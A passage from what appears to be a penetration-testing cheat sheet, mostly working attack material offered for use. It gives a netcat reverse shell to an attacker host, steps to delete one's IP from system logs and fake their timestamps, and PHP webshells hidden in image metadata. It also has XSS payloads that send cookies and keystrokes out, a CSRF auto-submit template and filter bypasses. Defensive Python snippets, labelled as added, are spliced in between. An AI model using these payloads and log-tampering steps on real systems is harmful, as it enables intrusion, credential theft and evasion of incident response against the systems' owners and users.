      • sc query "service_name" - checks the status of a service
      • sc start/stop "service_name" - starts or stops service
      • net start - lists running services
    5. Working with the File System
      • cd - navigates through the file system
      • dir - lists files and folders in the current directory
      • dir /ah - displays hidden files and folders
      • dir /ad - lists folders only
      • dir /b /s "folder and search term" - searches for files based on a keyword
      • mkdir - creates a new folder

          Reverse Shell

    1.  rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER_IP> <ATTACKER_PORT> >/tmp/f 

         Git

    1. git log - show the commit history
    2. git diff - show the difference between commits
    3. git blame - who changed each line of a file, and when
    4. git checkout - switch to a commit or branch
    5. git branch - show branches
    6. git tag - show all tags in the repo

         SSH and id_rsa

    • Copy id_rsa
    • chmod 600 id_rsa
    • This sets the right permissions for use (ssh requires that your private key files are NOT accessible by others)
    • Connect

         Clear log files

    1. Check for log file copies (for example ls -la /var/log/*.gz /var/log/*.1 /var/log/*.old)
    2. Save/check timestamps:
       stat /var/log/* > /tmp/log_timestamps.txt
    3. Delete:
       find /var/log -type f -exec sed -i '/YOUR_IP/d' {} \;
    4. Recover timestamps:
       touch -r /var/log/auth.log.1 /var/log/auth.log

       Or use this script if the timestamps were saved as in step 2
    5. Check the result:
       grep 'YOUR_IP' /var/log/*
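As a defender's counterpart to the steps above, the following is an added Python example (not part of this repository) that looks for the trace the timestamp-recovery step leaves behind: touch -r can reset a file's atime and mtime, but the inode change time (ctime) cannot be set from user space, so a log whose ctime is much newer than its mtime was modified after it was supposedly last written. The demo directory, file names and one-day offset are constructed; the check relies on POSIX ctime semantics (on Windows, st_ctime has a different meaning).

```python
"""Added example (not from the cheat sheet): detect log files whose mtime was reset.

`touch -r reference file` copies atime and mtime, but every metadata change bumps the
inode's ctime to "now", and there is no user-space call to set ctime back. A log file
whose ctime is far ahead of its mtime is therefore worth a closer look."""
import os
import tempfile
import time


def suspicious_mtime_reset(path, tolerance_seconds=60):
    """True if the inode changed much later than the content supposedly did."""
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) > tolerance_seconds


def check_log_dir(directory, tolerance_seconds=60):
    """Return the names of regular files in `directory` that fail the ctime/mtime check."""
    flagged = []
    for name in sorted(os.listdir(directory)):
        full = os.path.join(directory, name)
        if os.path.isfile(full) and suspicious_mtime_reset(full, tolerance_seconds):
            flagged.append(name)
    return flagged


def build_demo_dir():
    """Constructed demo: two fresh logs, one of which then gets its mtime pushed back a day
    (os.utime does what `touch -r old_reference auth.log` would do)."""
    directory = tempfile.mkdtemp(prefix="logcheck_")
    for name in ("auth.log", "syslog"):
        with open(os.path.join(directory, name), "w") as fh:
            fh.write("Mar  3 10:15:01 host sshd[2001]: Accepted publickey for alice\n")
    one_day_ago = time.time() - 86400
    os.utime(os.path.join(directory, "auth.log"), (one_day_ago, one_day_ago))
    return directory


if __name__ == "__main__":
    demo = build_demo_dir()
    print("mtime reset suspected on:", check_log_dir(demo))
```

On a real host, run check_log_dir over /var/log and compare with the rotation schedule: a freshly rotated file legitimately has ctime close to mtime, while a file that is days old by mtime but minutes old by ctime has been touched by something other than the logger.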

    Payloads

  • LFI and File Upload Linux and Windows Payloads
  • XSS Payloads
  • CSRF
  • Chains
  • Server Side Template Injection
  • CRLF
          LFI Payloads

    • For Linux
    • For Windows
    • %0a to bypass regex rules:
      http://vuln.host/some.php?file=%0a../../../../etc/passwd
    • DotDotPwn can help with testing (sudo apt install dotdotpwn)
          File Upload Bypassing
    • Magic Bytes:
      • PNG - 89 50 4E 47 0D 0A 1A 0A
      • JPEG - FF D8 FF
      • GIF (GIF89a) - 47 49 46 38 39 61
    • Upload a normal image file, intercept the request and try:
      • Change the file extension to php5 or similar variants
      • Double extension
      • Null byte
      • Change Content-Type
    • Injecting through EXIF data (single quotes keep the shell from expanding $_GET):
      exiftool -comment='<?php system($_GET["cmd"]); ?>' file.png
    • Raw insertion:
      echo '<?php system($_GET["cmd"]); ?>' >> file.jpeg
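Each bypass in the list above maps to a server-side check. The function below is an added Python example, not part of this repository: it allows only a single, allowlisted extension, rejects null bytes and double extensions, lets the magic bytes from the table above decide the type instead of the client's Content-Type, and scans the body for PHP or script tags to catch the EXIF-comment and raw-append tricks (the same body check also refuses an SVG carrying a script element). File names and image bytes are constructed; a genuine image can contain those byte sequences by chance, so the body scan is a cheap first filter and not a substitute for re-encoding uploaded images.

```python
"""Added example (not from the cheat sheet): server-side upload validation that
turns each bypass technique listed above into an explicit rejection rule."""
import re

# Magic bytes from the table above; the extension allowlist maps onto these types.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",   # 89 50 4E 47 0D 0A 1A 0A
    "jpeg": b"\xff\xd8\xff",       # FF D8 FF
    "gif": b"GIF89a",              # 47 49 46 38 39 61
}
ALLOWED_EXTENSIONS = {"png": "png", "jpg": "jpeg", "jpeg": "jpeg", "gif": "gif"}

# PHP open tags and script elements anywhere in the body (EXIF comment, appended data, SVG)
EMBEDDED_CODE = re.compile(rb"<\?php|<\?=|<script", re.IGNORECASE)


def validate_upload(filename, content_type, data):
    """Return (True, detected_type) or (False, reason).

    `content_type` is what the client claimed; it is accepted for the signature but
    deliberately never used, because the "Change Content-Type" bypass shows why."""
    del content_type
    if "\x00" in filename:
        return False, "null byte in filename"                 # shell.php%00.png
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False, "missing or double extension"            # shell.php.png, .htaccess, noext
    ext = parts[1]
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{ext} not allowed"          # .php5, .phtml, .svg, ...
    kind = ALLOWED_EXTENSIONS[ext]
    if not data.startswith(MAGIC[kind]):
        return False, "magic bytes do not match extension"     # type decided by content, not claim
    if EMBEDDED_CODE.search(data):
        return False, "embedded code in image body"            # exiftool -comment / echo >> tricks
    return True, kind


if __name__ == "__main__":
    sample_png = MAGIC["png"] + b"\x00\x00\x00\rIHDR" + b"\x00" * 16   # constructed stub
    print(validate_upload("avatar.png", "image/png", sample_png))
    print(validate_upload("avatar.png", "image/png", sample_png + b"<?php echo 1; ?>"))
```

The order of the checks matters: the cheap name-based rules run first, then the content rules, and the extension is only read from the final dot so that shell.php.png is never classified by its last component alone.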

          XSS Payloads

    XSS.report also suggests payloads
    1. Proof Of Concept (PoC):
      <scRIPt>alert('Success XSS!');</sCriPt>
      print()
      prompt()
      <img src=x onerror=alert()>
      <img src=x onerror="window.location.href='http://some.site'">
      <svg/onload=confirm("document.cookie")>
      <script>
          window.location = 'http://<ATTACKER_IP>:<ATTACKER_PORT>/page?param=' + document.cookie;
      </script>
      
      Like above, but only a request, without redirecting the page:
      <img src=x onerror="this.src='http://<ATTACKER_IP>:<ATTACKER_PORT>/page?param='+document.cookie">
      
    2. XSS -> LFI
      <script>
          x=new XMLHttpRequest;
          x.onload=function(){
              document.write(this.responseText)
          };
          x.open("GET","file:///etc/passwd");
          x.send();
      </script>
    3. The PoC above is the simplest kind of payload, where all you want to do is demonstrate that you can achieve XSS on a website. Other goals:

      Session Stealing -

       <script>fetch('url/steal?cookie=' + btoa(document.cookie));</script> 

      Details of a user's session, such as login tokens, are often kept in cookies on the target's machine. The JavaScript above takes the target's cookie, base64-encodes it to ensure successful transmission and then sends it to a website under the hacker's control to be logged. Once the hacker has these cookies, they can take over the target's session and be logged in as that user.

      Key Logger -

       <script>document.onkeypress = function(v) {fetch('url/log?key=' + btoa(v.key));}</script> 

      The code above acts as a key logger: anything typed on the webpage is forwarded to a website under the hacker's control. This is very damaging if the website the payload was installed on accepts user logins or credit card details.

      Business Logic -

       <script>user.changeEmail('[email protected]');</script> 

      This payload is a lot more specific than the examples above: it calls a particular network resource or JavaScript function. For example, imagine a JavaScript function for changing the user's email address called user.changeEmail().

      Polyglots -

       jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('Success XSS!'))//%0D%0A%0d%0a//\x3csVg/\x3e 

      An XSS polyglot is a string of text which can escape attributes, tags and bypass filters all in one. The polyglot above works in every context covered by the payloads above.

    4. XSS Bypass WAF:
      <details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//
    5. Try to download to bypass shielding file with name like:
      <img src=1 onerror=alert()>.png
    6. XSS through SVG file:
      
      <?xml version="1.0" standalone="no"?>
      <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
      <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
      <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
      <script type="text/javascript">
      	alert(document.domain);
      </script>
      </svg>
      		    
    7. XSS through metadata

      The response serving the file must carry the header Content-Type: text/html

      exiftool file.jpeg -Comment='<script>alert(1)</script>'
    8. Tips for exploit:
      • try to upload a file (image, svg, html) that contains xss payload inside
    9. Description of XSS payloads here

          CSRF

  • Template for the payload:

    <html>
        <body>
            <form action="https://ACTION_URL.COM" method="POST">
                <input type="hidden" name="email" value="[email protected]" />
                <input type="hidden" name="csrf" value="YOUR_CSRF" />
            </form>
            <img src="https://URL_WITH_PARAMETER_ASSIGNMENT/?PARAM=TEST%0d%0aSet-Cookie:%20csrf=NEEDED_CSRF_TOKEN%3b%20SameSite=None" onerror="document.forms[0].submit();" />
        </body>
    </html>

  • To avoid sending the Referer header:
    <meta name="referrer" content="never">
  • To submit the malicious request automatically:
    <script type="text/javascript">
        document.forms[0].submit();
    </script>

          Chains

  • Redirect bypasses for Open Redirect & SSRF!
    ?u=example2\.com  ❎
    ?u=example\.com@example2\.com ✅
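An added example, not from this repo, of the server-side check the example.com@example2.com trick above defeats when it is a string-prefix check, beside an allowlist check that parses the URL and compares only the hostname. The allowlist and URLs are constructed.

```python
from urllib.parse import urlsplit

# Constructed allowlist for the demo: the only host redirects may go to.
ALLOWED_HOSTS = {"example.com"}


def naive_is_allowed(url):
    """The prefix check the trick defeats: the string starts with the trusted
    origin, but the browser connects to whatever follows the '@'."""
    return url.startswith("https://example.com")


def safe_is_allowed(url, allowed_hosts=ALLOWED_HOSTS):
    """Parse the URL and compare only its hostname against the allowlist."""
    # Browsers (WHATWG) treat '\' as '/' in http(s) URLs, urllib does not;
    # refusing it removes the parser differential instead of guessing a side.
    if "\\" in url:
        return False
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False   # also rejects scheme-relative //host and javascript:
    if "@" in parts.netloc:
        return False   # userinfo: example.com@example2.com resolves to example2.com
    host = (parts.hostname or "").rstrip(".")
    return host in allowed_hosts


def pick_redirect(requested, fallback="/"):
    """Return the requested URL only if allowed, otherwise a local fallback."""
    return requested if safe_is_allowed(requested) else fallback
```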

          SSTI

    • Polyglot:
      ${{<%[%'"}}%\

         CRLF

    %0D%0A
    • %0D — CR (Carriage Return)
    • %0A — LF (Line Feed)
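Added example, not from this repo: a check for the CR/LF injection that the %0D%0A sequence above and the Set-Cookie trick in the CSRF template rely on, applied where a reflected value is about to be placed in a response header. The sample values are constructed.

```python
from urllib.parse import unquote

# Constructed values; the second has the shape of the PARAM value in the CSRF template.
SAFE_VALUE = "TEST"
INJECTED_VALUE = "TEST%0d%0aSet-Cookie:%20csrf=NEEDED_CSRF_TOKEN%3b%20SameSite=None"

FORBIDDEN = ("\r", "\n", "\x00")   # CR, LF and NUL must never reach a header line


def decode_repeatedly(value, max_rounds=3):
    """Undo layered percent-encoding (%250d%250a -> %0d%0a -> CR LF).

    Bounded so an attacker-controlled value cannot keep the loop busy.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def contains_crlf(value):
    """True if the decoded value could terminate the header line it is placed in."""
    decoded = decode_repeatedly(value)
    return any(ch in decoded for ch in FORBIDDEN)


def injected_header_names(value):
    """Header names a vulnerable server would emit after the first line break
    (what a detection rule would want to log)."""
    decoded = decode_repeatedly(value).replace("\r\n", "\n").replace("\r", "\n")
    return [line.split(":", 1)[0].strip() for line in decoded.split("\n")[1:] if ":" in line]


def add_reflected_header(headers, name, value):
    """Append (name, value) only when the value cannot start a new header line."""
    if contains_crlf(value):
        raise ValueError(f"refusing {name}: CR/LF in value {value!r}")
    headers.append((name, value))
    return headers
```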

    Sites

          Main resources

  • HackTricks - must have!!! PrivEsc, brute force, network and wifi pentesting, methodology cheatsheets and much more
  • Cloud HackTricks
  • Pentest notes
  • GTFO bins. How to escalate privs, how to get shells and much more with binaries on the target system
  • LOLBAS. Help with Windows
  • Shell-Storm. DB of shell-codes
  • thehacker.recipes. Help with AD
  • appsecexplained.gitbook.io. Help with exploiting vulns.
  • Search engine bug bounty. Help with vulns scanning
  • interactsh.com. Like a Burp Collaborator.

          Cheat sheets, hints

  • Bash scripting
  • How to pump an nc shell
  • Nmap
  • PowerShell cheatsheet
  • PowerShell tips and tricks
  • ired.team. Pentesting Cheatsheets. Convenient commands for your pentesting / red-teaming engagements, OSCP and CTFs
  • 1, 2 and 3 can help with ports
  • Reverse Shell cheatsheet
  • A Great Vim Cheat Sheet
  • SQLi cheatsheet
  • Another SQLi cheatsheet
  • SQLMap Command Generator
  • XSS.report. Help with xss payloads

          CVE and Vulnerabilities db

  • First.org. CVSS calculator 3.0
  • Cvexploits.io
  • CVE.circl db
  • CVSS search vulnerability
  • CVE.mitre db of Common Vulnerabilities and Exposures
  • Lana Codes Vulnerability Database (WordPress plugins)
  • Vulners.com database
  • OffSec exploit db
  • Rapid7 db
  • Vuldb.com. Vulnerability management and threat analysis platform
  • 0day db. Needs Tor
  • Routers db

          Dorks

  • Dorki.io.
  • Dorks examples for Bug Bounty
  • Dorksearch.com
  • Dorkgenius.com. Custom search dork creator
  • Dorks helper
  • Another dorks helper

          Hashes, encode/decode, cracker, identify

  • crackstation.net - online password hash cracker
  • Base64 encode/decode
  • Identify hash types
  • CyberChef - encode/decode service
  • Flask Session Cookie Decoder
  • NTLM.pw. Help with NTLM hashes.
  • RSA calculator

          Learning Path & Practice

  • CEH
  • Root.me
  • CTF365 - suitable for security professionals looking to acquire offensive skills, or system administrators interested in enhancing their defensive skills
  • Cryptohack. A free, fun platform for learning modern cryptography
  • TryHackMe
  • HackTheBox
  • Port Swigger
  • PentesterLab.com. Courses explaining vulnerabilities
  • Apisecuniversity. Free, real-world API security training
  • Ohmygit.org. Help with git in play mode.
  • HackThisSite - a free website with wargames to test and improve your white hat hacking skills. It offers a variety of hacking challenges in several categories, including basic tasks, phreaking, JavaScript, forensics, steganography, and more
  • Hackaday - serves up Fresh Hacks Every Day from around the Internet
  • CTFtime. CTF practice
  • BWAPP - buggy web application. Virtual pentest laboratory to practice
  • Free set of practice tasks. Thanks to TheXSSrat
  • OVERTHEWIRE - suitable for anyone looking to learn the theory of information security and apply it in practice regardless of their experience level
  • HACKING-LAB - provides CTF challenges for the European Cyber Security Challenge, but they also host regular competitions on their platform that anyone can participate in
  • PWNABLE.KR - this platform focuses on pwn challenges similar to CTF, which involve finding, reading, and submitting flag files that are present in each task
  • W3Challs - an educational platform with a variety of tasks in different categories, including hacking, wargames, forensics, cryptography, steganography, and programming. The platform aims to provide realistic challenges. Depending on the difficulty of the solved task, you earn points. There is also a forum where you can discuss and solve tasks with other participants
  • SmashTheStack - consists of 7 different wargames: Amateria, Apfel (currently offline), Blackbox, Blowfish, CTF (currently offline), Logic, and Tux. Each wargame contains a variety of tasks ranging from standard vulnerabilities to reverse engineering challenges
  • Microcorruption - is a CTF where you need to "reverse" fictional electronic locking devices called Lockitall. Lockitall devices protect bonds stored in warehouses owned by the fictional company CyYombinator. On the way to stealing the bonds, you will learn about assembly language, how to use a debugger, step through code, set breakpoints, and explore memory
  • The platform pwn0 - is a VPN where almost anything can happen. Fight against bots or users and earn points by gaining control over other systems

          MSFVenom help

  • gist.github
  • Cheat Sheet

          OSINT and Information Gathering

  • OSINT Framework. Aggregation of all popular tools and resources for OSINT
  • Archive of sites history
  • Babel street.
  • Crt.sh
  • Securityheaders. Check target site headers
  • chaos.projectdiscovery.io
  • Fofa. Passive scanner like Shodan
  • Netlas.io. Discover, scan and monitor any online assets
  • Intelx.io. Search engine with leaks from dark web resources
  • DNSdumpster. Passive and fast search of domains, subdomains, etc
  • Urldna.io. Free, comprehensive and powerful tool for web research. Collects SSL info, IP addresses, headers, cookies, some info about technologies, etc
  • Web-check.xyz. In just 20 seconds, you can see what attackers already know
  • Have I been pwned. Email leaks
  • Dehashed. Another source of email leaks
  • Geospy. This is an online service for determining the physical address of the location depicted in a photograph
  • Google Alert. Notifies you when the specified information appears on the Internet
  • ViewDNS Offers reverse IP Lookup
  • Netcraft. Information about a domain. Search URL template:
    https://sitereport.netcraft.com/?url=<TARGET_URL>
  • Shodan is the world's first search engine for Internet-connected devices.
  • SecurityHeaders. Security headers scanner
  • Observatory.mozilla. Security headers scanner
  • This is a system that gathers all available information about companies and extracts data from it
  • Censys Search Can provide a lot of information about IP addresses and domains
  • Robtex. Whois-like tool. Technologies, servers, IPs, DNS configuration and other info about the target
  • Database of SSL/TLS certificates issued for domain names
  • Metasearch Engine:
    1. Fagan Finder - is an excellent source of information. You enter a query, then click on the desired source. Then you are redirected to the relevant page. The most important thing is that it shows how many sources there can be and how diverse they can be: from the Library of Congress website to leak publication services
    2. Intelligence X - it not only searches for leaks but also helps navigate other OSINT tools. Services for email verification, DNS search - you'll find them here too. Go to the Tools section and search specifically
  • Tools for people search by photo:
    1. Social Catfish - is the perfect facial recognition search engine that can search for people by face, name, email, address, and username
    2. Spokeo - is a database used for identifying people and providing accurate information about them. It is constantly updated and boasts over 6 million consumers, 130 million property records, 600 million legal records, and over 120 social networks, making it an ideal people search system for personal and business use
    3. Google Image Search - uses the powerful Google Bot to scan all publicly accessible websites for images to create the largest and most frequently updated image database in the world
    4. PimEyes - is one of the best facial recognition search engine tools that allows you to perform in-depth image searches on the internet. Advanced convolutional neural networks analyze the image you upload to find objects and match them with the database
    5. FaceCheck.ID - is one of the best reverse image search tools for facial recognition. You can use it to search for images of a specific person. It identifies faces in the photo you upload, and then finds similar faces in social media posts, online videos, fraudulent accounts, websites, news and blog pages, as well as in product marketing

         Password Services

  • wordlists.assetnote.io/
  • CIRT.net Default Passwords service
  • Default-Password.info Default Passwords service
  • Datarecovery.com Default Passwords service
  • Passwordsdatabase another one default passwords service
  • This wiki page includes the most well-known collections of passwords
  • Weakpass.com is a collection of password lists for various purposes, from penetration testing to improving password security

          Dashboards for Cyber Threat Monitoring

  • cybermap.kaspersky. A colorful globe designed in the best traditions of Hollywood hacker movies. Its real value lies not in its design but in the informative panel with statistics collected from the company's security products. Additionally, Kaspersky Lab supports a dashboard with information on current threats, located here.
  • Live Threat Map. Here, you can view summary statistics on cyberattacks over the last hour, day, or month, as well as highlight the most targeted countries, top attack vectors, and most scanned ports.
  • Talos Reputation Center. A dashboard with general information on cyber threats, created by Talos with support from Cisco.
  • Cyber Attack Map. A map featuring the top spam and malware-spreading servers.
  • Sicherheitstacho. A cyberattack dashboard from Deutsche Telekom, which operates on the open-source honeypot network: T-Pot.

          Other

  • fpcentral.irisa.fr. Check fingerprint
  • amiunique.org. Like the one above
  • blindf.com. Helps with Blind XSS
  • Shazzer. Shared online fuzzing

    <-- Back

    Tools

    1. GitHub Tools
    2. Browsers extensions. Note: Chrome extensions also work with Brave Browser
    3. Burp Suite Extensions
    4. Kali Tools
    5. Platforms for hacking and pentesting

          GitHub Tools

    My GitHub stars where I categorized github tools.

    👇Some of the most awesome tools (IMHO)👇

    1. BruteForce & Wordlists
    2. Enumeration
    3. OSINT
    4. Payloads
    5. Privilege Escalation
    6. Social Engineering
    7. Looking for exploits and vulnerabilities
    8. Another
    1. BruteForce and Wordlists

      • Active Directory Wordlists contains User.txt and Pass.txt
      • BruteForce Database
      • YAWR. Yet Another Wordlists Repo. Contains OS,RECON,WEB,brute folders
      • Crunch

        This is one of many powerful tools for creating an offline wordlist. With crunch, you can specify numerous options, including the minimum and maximum length and the character set. The following example creates a wordlist containing all possible 3-character combinations of the characters 1-5 and qwerty. Use the -o argument to save the output to a file.

        Example:

         crunch 3 3 12345qwerty -o cranch.txt 
      • Top wordlists by DanielMiessler
      • DNS asynchronous bruteforce
      • Tool for hash identification.

        Python file. Powerful. User friendly interface.

      • Kerberos bruteforcing
      • Username generator

        Could help create a list with most of the possible username combinations if we have a first name and last name. Use git clone and

         python3 username_generator.py -h 
        shows the tool's help message and optional arguments.
      • Wordlists by kkrypt0nn. A collection of wordlists for many different usages
    2. Enumeration

      • WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools
      • Certipy. Tool for Active Directory Certificate Services enumeration and abuse
      • Fuzzer
      • fuzzdb
      • Knock.py - subdomain scanner
      • Linux smart enumeration
      • Sublist3r. Subdomain enumeration python tool
    3. OSINT

    4. Payloads

      • All kinds of payloads and bypasses
      • Payloads for Unix and Windows OS
      • XSS-LOADER. All-in-one tool: XSS payload generator, XSS scanner, XSS dork finder
      • XSS payloads
    5. Privilege Escalation

    6. Social Engineering

      • Awesome social engineering resources
      • SET. Social Engineer Toolkit
    7. Looking for exploits and vulnerabilities

      • Searchsploit - provides direct access to the Exploit Database from the Kali Linux terminal. Users can utilize powerful search commands to quickly discover exploits and vulnerabilities. This tool is an indispensable assistant for security professionals working in the Kali Linux environment
      • getsploit - combines the functionality of searchsploit with the ability to download exploits. It allows users to conduct online searches across databases such as Exploit-DB, Metasploit, and Packetstorm. Additionally, it provides the capability to download exploit source code directly, making the search and retrieval of necessary data for pentesting simple and effective
      • CVEMap - a tool from Projectdiscovery designed for quick and convenient searching across all known vulnerability databases
      • Pompem - a tool pre-installed in Parrot OS, automates the process of searching for exploits and vulnerabilities. It uses an advanced search system to check databases such as PacketStorm Security, CXSecurity, ZeroDay, Vulners, and NVD
      • SiCat - stands out for its comprehensive approach to exploit searching. It adeptly extracts information about exploits from open sources and local repositories
    8. Another

      • Wapiti. Web vulnerability scanner
      • Bearer. Scans source code against top security and privacy risks
      • CrackMapExec. A swiss army knife for pentesting networks
      • BloodHound. Six Degrees of Domain Admin
      • Cewl can be used to effectively crawl a website and extract strings or keywords. Cewl is a powerful tool to generate a wordlist specific to a given company or target. Consider the following example:
         cewl -w list.txt -d 5 -m 5 http://target_site.com 

        -w writes the contents to a file, here list.txt.

        -m 5 gathers strings (words) that are 5 characters or more

        -d 5 is the depth level of web crawling/spidering (default 2)

        http://target_site.com is the URL that will be used

        As a result, you now have a decently sized wordlist based on relevant words for the specific enterprise, like names, locations, and a lot of their business lingo. Similarly, the wordlist that was created could be used to fuzz for usernames.

      • Hexeditor

        Tool for changing file signatures. Link to the Wikipedia list of file signatures.

      • Lynis. Check Linux security
      • Pspy. Great for enumeration of Linux systems in CTFs and more.
      • Hash Identifier. Python file. Powerful. User friendly interface.

          Browser extensions

    • Wappalyzer (FireFox | Chrome) - Detects the CMS, JS libraries, frameworks and other technologies used on the site
    • Foxy Proxy (FireFox | Chrome) - Quick proxy switching, for example to use with Burp Suite
    • Rested (FireFox) - Quick request sender. Useful with APIs
    • Altair (FireFox | Chrome) - Helps with GraphQL requests
    • HackTools (FireFox | Chrome) - A web extension facilitating your web application penetration tests; it includes cheat sheets as well as the tools used during a test, such as XSS payloads and reverse shells
    • Cookie Editor (FireFox | Chrome) - Allows you to change, delete, add cookie values for various testing purposes. Can be tested for access control errors, privilege escalation, etc
    • Hackbar (FireFox | Chrome) - Contains payloads for XSS attacks, SQL injections, WAF bypass, LFI, etc
    • ModHeader (FireFox | Chrome) - Helps to easily change HTTP request and response headers in the browser
    • User-Agent Switcher (FireFox | Chrome)
    • Wayback Machine (FireFox | Chrome) - Official Internet Archive Wayback Machine Browser Extension. Non official for FireFox
    • Firefox Multi-Account Containers. Lets you keep parts of your online life separated into color-coded tabs.
    • Beautifier & Minify (FireFox | Chrome) - Brings readable CSS, HTML and JavaScript code
    • BuiltWith (FireFox | Chrome) - Get web app technologies
    • DotGit (FireFox | Chrome) - An extension to check for the presence of .git on websites you visit. Also checks open .env files, security.txt and more
    • Email Extractor (FireFox | Chrome) - Automatically saves email addresses from the web pages you visit. Helps with social engineering attacks, brute force attacks, etc
    • Exif-Viewer (FireFox | Chrome) - Helps check photo metadata
    • Fake Filler (FireFox | Chrome) - Simplifies and speeds up testing of fillable forms by developers and testers. Helps to populate all input forms (text fields, areas, dropdowns, etc.) with fake and randomly generated data
    • Knoxss (FireFox) - Finds XSS vulnerabilities. Community Edition and Pro Version
    • Nimbus Screenshot (FireFox | Chrome) - To make screenshot
    • Privacy Badger (FireFox | Chrome) - Automatically learns to block invisible trackers
    • Temp Mail (FireFox) - Temporary disposable email address. Protect your email from spam, bots and phishing with Temp-Mail
    • Retire.js (FireFox | Chrome) - Displays the presence of vulnerable JavaScript libraries. This helps to find known vulnerabilities in JS and some CVEs affecting sites with vulnerable JS libraries
    • Shodan (FireFox | Chrome) - The Shodan plugin tells you where the website is hosted (country, city), who owns the IP and what other services/ ports are open
    • Ublock Origin (FireFox | Chrome) - An efficient wide-spectrum content blocker
    • Chaff (Chrome) - Generate fake traffic
    • TruffleHog Chrome Extension (FireFox | Chrome) - Scans the websites you visit looking for API keys and credentials and notifies you if they are found
    • OWASP Penetration Testing Kit (FireFox | Chrome) - Helps check for common bugs
    • Vulners Web Scanner (FireFox | Chrome) - Tiny and passive vulnerability scanner based on vulners.com vulnerability database
    • Web Developer (FireFox | Chrome) - Adds a toolbar button with various web developer tools
    • Panic Button (FireFox | Chrome) - Quickly hide all browser windows with a click of a button

          Burp Suite Extensions

    • Autorize helps detect authorization vulnerabilities
    • Logger++ allows advanced filters to be defined to highlight interesting entries or filter logs to only those which match the filter
    • PyCrypt enables users to encrypt and decrypt requests and responses for manual and automated application penetration testing
    • JWT Editor. An extension for editing, signing, verifying, encrypting and decrypting JSON Web Tokens (JWTs)
    • Software Vulnerability Scanner - This extension displays public vulnerabilities for applications detected in the traffic proxied by Burp. Essentially, it acts as a layer between Burp and the API of this excellent vulnerability aggregator
    • Backslash Powered Scanner - Enhances Burp's active scanner using a novel approach capable of finding and confirming both known and unknown classes of server-side injection vulnerabilities
    • CSTC, Modular HTTP Manipulator - CyberChef integrated in BurpSuite with live modification of requests at your fingertips
    • SQLiPy - A tool that integrates Burp Suite with SQLMap using the SQLMap API to check for SQL injection vulnerabilities
    • Active Scan++ - Expands the range of checks performed by the active and passive scanners. It identifies vulnerabilities such as cache poisoning, DNS rebinding, various injections, and also performs additional checks to detect XXE injections and more
    • Turbo Intruder - A faster alternative to Intruder equipped with a scriptable engine for sending a large number of HTTP requests and analyzing the results. Useful when speed is required
    • Bypass WAF - A tool for bypassing web application firewalls (WAFs)
    • BurpJS Link Finder - Helps identify and discover links based on JavaScript in web applications
    • 403 Bypasser Extension - A tool designed to bypass 403 errors commonly encountered when attempting to access restricted areas of a website
    • InQL to assist in your GraphQL security testing efforts
    • Backslash Powered Scanner. This extension complements Burp's active scanner by using a novel approach capable of finding and confirming both known and unknown classes of server-side injection vulnerabilities
    • Hackvertor is a tag-based conversion tool that supports various escapes and encodings including HTML5 entities, hex, octal, unicode, url encoding etc
    • OpenAPI Parser. Streamlines the process of assessing web services that use OpenAPI-based APIs
    • JS Link Finder. Passively scans JavaScript files for endpoint links. Can export results to a text file and exclude specific js files, e.g. jquery, google-analytics (Professional)
    • Content Type Converter. This extension converts data submitted within requests between various common formats:
      • JSON To XML
      • XML to JSON
      • Body parameters to JSON
      • Body parameters to XML
    • Param miner. Extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities
    • Pentest Mapper. An extension that integrates Burp Suite request logging with a custom application testing checklist
    • Piper makes integrating external tools into Burp easier

          Kali Tools

    1. Name That Hash - Instantly name the type of any hash (with hashcat command). Usage: name-that-hash --help
    2. wafw00f - This package identifies and fingerprints Web Application Firewall (WAF) products. Usage: wafw00f -h
    3. gowitness is a website screenshot utility, that uses Chrome Headless to generate screenshots of web interfaces using the command line
    4. Commix is an open source penetration testing tool for command injections

         Platforms for hacking and pentesting

    <-- Back

    Privilege Escalation

    ENUMERATION is key!

          Linux

    Some advice for Linux privilege escalation
    1. Check out which user you are running as - whoami
    2. Check out which groups the running user belongs to - id
    3. Check out the server's hostname - hostname
    4. Check out which subnet you landed in - ifconfig or ip a
    5. Check out the kernel ( uname -a ) and OS version ( cat /etc/os-release )
    6. Check out the screen version - screen -v
    7. Check out the .ssh folder in /home/<USERNAME>/.ssh or /root/.ssh
    8. Check out all environment variables - env
    9. Check out which login shells exist on the server - cat /etc/shells
    10. Check out cron and init scripts:

      ls -la /etc/cron.d

      ls -la /etc/init.d

    11. Check out setuid and setgid. To find files with the setuid or setgid bit set:

      find / -perm -u=s -type f 2>/dev/null
      find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
      find / -perm -4000 2>/dev/null

      To check out the permissions

      ls -la
    12. Find world-writable files - find / -perm -2 -type f 2>/dev/null
    13. Check out NOPASSWD sudo commands - sudo -l
    14. Check out PATH - echo $PATH
    15. Check out the routing table - route or netstat -rn
    16. Check out the ARP table - arp -a
    17. Check out the process environment - cat /proc/self/environ
    18. Check out history:

      history

      cat ~/.bash_history

      cat ~/.mysql_history

      cat ~/.nano_history

      cat ~/.php_history

      cat ~/.atftp_history

      cat ~/.*history | less - search all history files

    19. Check out executable files in the home directory and /var/www or similar
    20. Check out additional information about the host itself, such as the CPU type/version - lscpu
    21. Check out the logrotate version - logrotate --version. This github tool can help with privesc
    22. Look at:
      • Open ports
      • .bat and .bak files
      • Interesting permissions
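The find commands above for setuid/setgid files and world-writable files, as a portable audit script an administrator can run over a tree or a mounted image. Added example, not from this repo; build_demo_tree creates a constructed throwaway directory so the script runs offline.

```python
import os
import stat
import sys
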